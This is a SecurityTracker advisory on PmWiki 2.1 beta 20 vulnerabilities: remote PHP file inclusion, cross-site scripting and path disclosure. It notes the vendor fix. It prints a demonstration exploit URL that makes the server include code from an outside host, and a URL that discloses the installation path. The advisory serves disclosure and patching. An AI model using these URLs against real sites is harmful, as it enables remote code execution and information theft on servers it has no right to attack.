SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PmWiki Vendors:   pmwiki.org
PmWiki Include File Bug Lets Remote Users Execute Arbitrary Code and Input Validation Bugs Permit Cross-Site Scripting, and Path Disclosure Attacks
SecurityTracker Alert ID:  1015550
SecurityTracker URL:  http://securitytracker.com/id/1015550
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 30 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.1 beta 20
Description:   Francesco "aScii" Ongaro reported a vulnerability in PmWiki. A remote user can execute arbitrary code on the target system. A remote user can also conduct cross-site scripting attacks and determine the installation path.

The software does not properly validate user-supplied input. If register_globals is enabled and PHP 5 is used, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.ush.it

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PmWiki software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can also supply the following type of URL to cause the system to disclose the installation path.

/pmwiki.php?GLOBALS&_SERVER&_REQUEST&_GET&_POST&_ENV

The original advisory is available at:

http://www.ush.it/2006/01/24/pmwiki-multiple-vulnerabilities/

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PmWiki software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   The vendor has issued a fixed version (2.1.beta21), available at:

http://pmwiki.org/wiki/PmWiki/Download

Vendor URL:  pmwiki.org/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PmWiki Multiple Vulnerabilities

PmWiki Multiple Vulnerabilities

 Name              Multiple Vulnerabilities in PmWiki
 Systems Affected  PmWiki (verified on 2.1 beta 20)
 Severity          Medium Risk
 Vendor            www.pmichaud.com/wiki/PmWiki/PmWiki
 Advisory  http://www.ush.it/2006/01/24/pmwiki-multiple-vulnerabilities/
 Author            Francesco "aScii" Ongaro (ascii at katamail . com)
 Date              20060119

NOTE: This work only with REGISTER_GLOBALS ON on many versions of PHP5 (tested on 5.0.5, 5.1.1, 5.1.2).

This vulnerability defeat PmWiki global sanitizing code and allow
remote arbitrary file inclusion.

Advisory released on 20060128:
PmWiki Multiple Vulnerabilities
http://www.ush.it/2006/01/24/pmwiki-multiple-vulnerabilities/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC